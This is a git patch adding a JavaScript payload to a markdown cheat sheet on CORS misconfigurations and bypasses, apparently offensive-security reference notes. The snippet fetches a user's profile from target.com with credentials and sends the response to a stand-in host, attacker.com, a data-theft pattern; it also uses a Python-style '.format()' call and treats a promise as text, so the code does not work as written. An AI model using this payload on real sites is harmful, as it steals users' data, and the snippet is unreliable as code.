From fb0c538961af2606dd8a49a4d75d811e6670f43e Mon Sep 17 00:00:00 2001
From: Mehdi
Date: Fri, 23 Aug 2024 16:44:56 +0330
Subject: [PATCH] Update CORS - Misconfigurations & Bypass.md
---
 CORS - Misconfigurations & Bypass.md | 9 +++++++++
 1 file changed, 9 insertions(+)
diff --git a/CORS - Misconfigurations & Bypass.md b/CORS - Misconfigurations & Bypass.md
index 68abf53..8206245 100644
--- a/CORS - Misconfigurations & Bypass.md
+++ b/CORS - Misconfigurations & Bypass.md
@@ -30,6 +30,15 @@ xhr.withCredentials = true;
 xhr.send(null);
 ```
+```javascript
+fetch("https://target.com/api/user/profile", {
+ credentials: "include"
+})
+.then((response) => {
+ document.location = "//attacker.com/log?key={0}".format(response.text());
+});
+```
+
 ```javascript
 fetch(url, {
 credentials: 'include'